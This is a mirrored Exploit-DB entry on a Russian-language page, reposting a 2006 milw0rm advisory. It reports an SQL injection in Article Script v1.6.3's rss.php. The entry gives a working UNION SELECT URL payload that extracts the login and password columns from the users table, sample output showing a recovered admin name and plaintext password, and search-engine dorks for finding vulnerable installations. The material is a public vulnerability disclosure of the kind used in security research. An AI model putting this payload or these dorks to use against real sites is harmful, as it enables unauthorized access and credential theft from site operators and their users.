- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2728
- Проверка EDB
-
- Пройдено
- Автор
- LIZ0ZIM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5765
- Дата публикации
- 2006-11-06
Код:
Article Script v1.*and v1.6.3 Sql injection
Script Name :Article Script
Home Page:www.articlescript.org
Bug Founder :Liz0ziM
Mail:[email protected]
Baba Kimdir? Tabiki Liz0ziM
------------------------------------------------------------
http://www.victim.com/articles/rss.php?category= ' sql İnjection
Example:
http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
<title>admin4521title> ------> Admin name :admin4521
<link>http://www.victim.com/articles/cs1120/page_1/link> ----------> Admin password cs1120
Dork:
"Powered by Article Script"
":: Article Script - New User Article ::"
intitle:":: Article Script -"
"Last Articles::"
Greatz My all friend
Source: http://www.blogcu.com/Liz0ziM/1312100/
# milw0rm.com [2006-11-06]- Источник
- www.exploit-db.com
